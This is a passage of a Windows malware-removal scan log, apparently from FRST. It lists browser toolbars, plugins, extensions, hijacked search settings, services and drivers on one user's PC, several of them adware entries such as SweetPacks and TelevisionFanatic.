Toolbar: HKLM-x32 - Yahoo! Axis for IE - {035FDC10-9F1D-430E-87DA-573FFBF5608D} - C:\Program Files (x86)\Yahoo!\YNanoClient\cpn1\YNanoClient_IE.dll [2012-10-13] (Yahoo! Inc.)
Toolbar: HKLM-x32 - QuickShare Widget - {ae07101b-46d4-4a98-af68-0333ea26e113} - C:\Windows\SysWOW64\mscoree.dll [2015-07-10] (Microsoft Corporation)
Toolbar: HKLM-x32 - SweetPacks Toolbar for Internet Explorer - {EEE6C35B-6118-11DC-9C72-001320C79847} - C:\Program Files (x86)\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll No File
Toolbar: HKLM-x32 - Protected Toolbar - {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} - C:\Program Files (x86)\Protected\prxtbProt.dll No File
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\coIEPlg.dll [2015-07-09] (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-07-20] (Google Inc.)
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {4B3803EA-5230-4DC3-A7FC-33638F3D3542} - No File
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-07-20] (Google Inc.)
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {06AEDB90-98B2-4989-AD0F-39D53551F6AD} - No File
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {739DF940-C5EE-4BAB-9D7E-270894AE687A} - No File
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> No Name - {C5C4FD2C-C7AC-492C-A689-2E0843BA4E55} - No File
DPF: HKLM {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} hxxp://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
Handler: tbr - {4D25FB7A-8902-4291-960E-9ADA051CFBBF} - C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File

FireFox:
========
FF ProfilePath: C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default
FF NewTab: hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzZ70aWXKwZIW9RA1LRSh2982syhqwv6-PG_JRvNPeCKrxE67JY3HQ97ynlRvPU4A,
FF DefaultSearchEngine: Google
FF DefaultSearchEngine.US: Google
FF DefaultSearchUrl: hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3309762&CUI=UN66126008119710230&UM=2&SearchSource=3&q={searchTerms}
FF Homepage: hxxps://www.yahoo.com/
FF Keyword.URL: hxxp://trovi.com/ResultsExt.aspx?ctid=CT3309762&SearchSource=2&CUI=UN66126008119710230&UM=2&q=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-07-30] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-01-24] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-24] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll [2013-09-06] (McAfee, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @oberon-media.com/ONCAdapter -> C:\Program Files (x86)\Common Files\Oberon Media\NCAdapter\1.0.0.7\npapicomadapter.dll [2010-09-01] (Oberon-Media )
FF Plugin-x32: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll [2013-02-14] (RocketLife, LLP)
FF Plugin-x32: @TelevisionFanatic.com/Plugin -> C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\NP64Stub.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-14] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-14] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\4\NP_wtapp.dll [2014-05-13] ()
FF Plugin-x32: @zylom.com/ZylomGamesPlayer -> C:\ProgramData\Zylom\ZylomGamesPlayer\npzylomgamesplayer.dll [2009-07-02] (Zylom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Ken Terry\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-05-22] (Citrix Online)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll No File
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Ken Terry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2012-11-12] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: @yahoo.com/BrowserPlus,version=2.9.8 -> C:\Users\Ken Terry\AppData\Local\Yahoo!\BrowserPlus\2.9.8\Plugins\npybrowserplus_2.9.8.dll [2010-08-04] (Yahoo! Inc.)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: facebook.com/fbDesktopPlugin -> C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll [2013-03-07] (Facebook, Inc.)
FF user.js: detected! => C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\user.js [2013-06-05]
FF Extension: Unit Layers - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2013-06-05]
FF Extension: Block site - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\{dd3d7613-0246-469d-bc65-2a3cc1668adc} [2015-09-06]
FF Extension: Selenium IDE: C# Formatters - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2015-08-31]
FF Extension: Firebug - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2012-10-12]
FF Extension: Selenium IDE: Java Formatters - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2015-08-31]
FF Extension: Printing Helper - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [1670-07-29]
FF Extension: Selenium IDE: Python Formatters - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2015-08-31]
FF Extension: Selenium IDE: Ruby Formatters - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\[email protected] [2015-08-31]
FF Extension: Selenium IDE - C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Extensions\{a6fd85ed-e919-4a43-a5af-8da18bda539f}.xpi [2015-08-31]
FF Extension: Unit Layers - C:\Program Files (x86)\Mozilla Firefox\extensions\[email protected] [2015-08-31]
FF Extension: Selenium IDE: C# Formatters - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-08-31]
FF HKLM\...\Firefox\Extensions: [{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}] - C:\Program Files\Updater By SweetPacks\Firefox
FF Extension: No Name - C:\Program Files\Updater By SweetPacks\Firefox [2013-06-05]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_22.5.0.124\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_22.5.0.124\coFFPlgn [2015-09-17]
FF HKLM-x32\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin
FF Extension: No Name - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin [2011-10-19]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2013-03-06]
FF HKLM-x32\...\Firefox\Extensions: [{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}] - C:\Program Files\Updater By SweetPacks\Firefox
FF HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\SingAlong\FF
FF Extension: Sing Along - C:\Program Files (x86)\SingAlong\FF [2013-05-22]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2015-08-31] <==== ATTENTION

Chrome:
=======
CHR HomePage: Default -> hxxp://www.search.ask.com/?gct=hp
CHR StartupUrls: Default -> "hxxp://yahoo.com/","hxxps://www.google.com/"
CHR DefaultSearchURL: Default -> hxxp://www.search.ask.com/web?q={searchTerms}
CHR DefaultSearchKeyword: Default -> search.ask.com
CHR DefaultSuggestURL: Default -> hxxp://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms}
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\pdf.dll => No File
CHR Plugin: (GoogleChromeRemotePlugin) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\amfclgbdpgndipgoegfpkkgobahigbcl\1.4_0\GoogleChromeRemotePlugin.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (AdobeAAMDetect) - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll => No File
CHR Plugin: (Oberon com adapter) - C:\Program Files (x86)\Common Files\Oberon Media\NCAdapter\1.0.0.7\npapicomadapter.dll (Oberon-Media )
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U15) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
CHR Plugin: (MindSpark Toolbar Platform Plugin Stub) - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\NP64Stub.dll => No File
CHR Plugin: (WildTangent Games App V2 Presence Detector) - C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll => No File
CHR Plugin: (Windows Live0099 Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (RocketLife Secure Plug-In Layer) - C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll (RocketLife, LLP)
CHR Plugin: (Zylom Plugin) - C:\ProgramData\Zylom\ZylomGamesPlayer\npzylomgamesplayer.dll (Zylom)
CHR Plugin: (Unity Player) - C:\Users\Ken Terry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
CHR Plugin: (Facebook Desktop) - C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll (Facebook, Inc.)
CHR Plugin: (BrowserPlus (from Yahoo!) v2.9.8) - C:\Users\Ken Terry\AppData\Local\Yahoo!\BrowserPlus\2.9.8\Plugins\npybrowserplus_2.9.8.dll (Yahoo! Inc.)
CHR Plugin: (Hulu Desktop) - C:\Windows\..\Users\Default\AppData\Local\HuluDesktop\instances\0.9.13.1\npHDPlg.dll (Hulu LLC)
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_202.dll => No File
CHR Plugin: (Java Deployment Toolkit 7.0.150.3) - C:\Windows\SysWOW64\npDeployJava1.dll => No File
CHR Profile: C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Entanglement Web App) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\aciahcmjmecflokailenpkdchphgkefd [2013-10-28]
CHR Extension: (Norton Security Toolbar) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2015-07-15]
CHR Extension: (Elite Unzip) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gafhhbahpojnjfhpepjjfjojbphnogmn [2015-01-18]
CHR Extension: (Norton Identity Safe) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-26]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-10]
CHR Extension: (Skype Click to Call) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-01-11]
CHR Extension: (AudioToAudio) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkbekmickkafhbgkehknddbfmhddckem [2015-01-07]
CHR Extension: (Poppit!) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbkbpnkkkipelfledbfocopglifcfmi [2013-10-28]
CHR Extension: (Ask Search) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl [2015-01-18]
CHR Extension: (iLivid) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf [2015-01-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-04]
CHR Extension: (20-20 3D Viewer for IKEA) - C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfhldcakmgpmglboaclpfdedehjblalp [2014-04-13]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\Exts\Chrome.crx [2015-07-23]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [amfclgbdpgndipgoegfpkkgobahigbcl] - C:\Users\Ken Terry\AppData\Local\Smartbar/Application\1Extension.crx <not found>
CHR HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [knhpkjjdbjjchglnophlnghcdefpanlc] - C:\Users\Ken Terry\AppData\Local\CRE\knhpkjjdbjjchglnophlnghcdefpanlc.crx [2013-11-24]
CHR HKLM-x32\...\Chrome\Extension: [abepbblpkilpjohncjbccmdjhdhbnhdj] - C:\Program Files (x86)\SingAlong\Chrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\Exts\Chrome.crx [2015-07-23]
CHR HKLM-x32\...\Chrome\Extension: [fjoijdanhaiflhibkljeklcghcmmfffh] - C:\Program Files (x86)\WebCake\WebCakeLayers.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [knhpkjjdbjjchglnophlnghcdefpanlc] - C:\Users\Ken Terry\AppData\Local\CRE\knhpkjjdbjjchglnophlnghcdefpanlc.crx [2013-11-24]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-05-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-05-29] (Apple Inc.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1394816 2015-05-01] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1772672 2015-05-01] (Microsoft Corporation)
S2 CLKMSVC10_C6F09094; C:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\HDDVD\NavFilter\kmsvc.exe [245232 2010-06-29] (CyberLink)
R2 ESRV_SVC_WILLAMETTE; C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [413848 2015-07-16] ()
S3 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2014-04-24] (WildTangent)
R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2010-05-19] (Hewlett-Packard Company) [File not signed]
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [288776 2013-09-06] (McAfee, Inc.)
R2 MSMQ; C:\Windows\system32\mqsvc.exe [26112 2015-08-11] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\NIS.exe [282016 2015-07-16] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2004488 2015-07-15] (Electronic Arts)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [635416 2009-10-14] (PDF Complete Inc)
R2 PGMTrusted; C:\Program Files (x86)\Pogo Games\PGMTrusted.exe [519920 2012-09-06] (iWin Inc.)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
R2 RalinkRegistryWriter; C:\Program Files (x86)\Ralink\Common\RaRegistry.exe [372736 2012-01-12] (Ralink Technology, Corp.) [File not signed]
R2 RalinkRegistryWriter64; C:\Program Files (x86)\Ralink\Common\RaRegistry64.exe [447488 2012-01-12] (Ralink Technology, Corp.) [File not signed]
S2 RaMediaServer; C:\Program Files (x86)\Ralink\Common\RaMediaServer.exe [625728 2011-08-18] ()
R2 rscp; C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_svc.exe [163576 2015-09-12] ()
R2 rsEngineSvc; C:\Program Files\Reason\Security\rsEngineSvc.exe [80144 2015-08-12] (Reason Software Company Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-06-24] (Realtek Semiconductor)
R2 sprtsvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\sprtsvc.exe [206120 2010-06-17] (SupportSoft, Inc.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SystemUsageReportSvc_WILLAMETTE; C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe [105112 2015-07-16] ()
R2 tgsrvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\tgsrvc.exe [185640 2010-06-17] (SupportSoft, Inc.)
S3 USER_ESRV_SVC_WILLAMETTE; C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [413848 2015-07-16] ()
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [84480 2015-08-11] (Microsoft Corporation)
R2 W3SVC; C:\Windows\system32\inetsrv\iisw3adm.dll [578560 2015-08-11] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
R2 YNanoService; C:\Program Files (x86)\Yahoo!\YNanoClient\cpn0\YNanoService.exe [157016 2012-05-23] (Yahoo! Inc.)
S2 TelevisionFanaticService; C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64barsvc.exe [X]
S2 Updater By SweetPacks; C:\Program Files\Updater By SweetPacks\ExtensionUpdaterService.exe [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
R1 BHDrvx64; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\BASHDefs\20150904.001\BHDrvx64.sys [1650936 2015-07-23] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1605020.00F\ccSetx64.sys [173808 2015-07-10] (Symantec Corporation)
S3 CpqDfw; C:\Windows\System32\drivers\CpqDfw.sys [27456 2012-05-29] (Windows (R) Codename Longhorn DDK provider)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-07-27] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [153936 2015-07-27] (Symantec Corporation)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [32512 2014-03-12] ()
R1 IDSVia64; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\IPSDefs\20150916.001\IDSvia64.sys [767224 2015-08-28] (Symantec Corporation)
R3 MQAC; C:\Windows\System32\drivers\mqac.sys [175104 2015-08-11] (Microsoft Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\VirusDefs\20150916.022\ENG64.SYS [138488 2015-05-20] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\VirusDefs\20150916.022\EX64.SYS [2146040 2015-05-20] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 PAEAFLT.sys; C:\Windows\System32\drivers\PAEAFLT.sys [9472 2007-09-26] (PixArt Imaging Incorporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek )
R3 semav6msr64; C:\WINDOWS\system32\drivers\semav6msr64.sys [21984 2015-06-04] ()
R3 SRTSP; C:\Windows\System32\Drivers\NISx64\1605020.00F\SRTSP64.SYS [926448 2015-07-10] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1605020.00F\SRTSPX64.SYS [50936 2015-07-10] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NISx64\1605020.00F\SYMEFASI64.SYS [1620720 2015-07-10] (Symantec Corporation)
S0 SymELAM; C:\Windows\System32\drivers\NISx64\1605020.00F\SymELAM.sys [24192 2015-07-10] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-07-23] (Symantec Corporation)
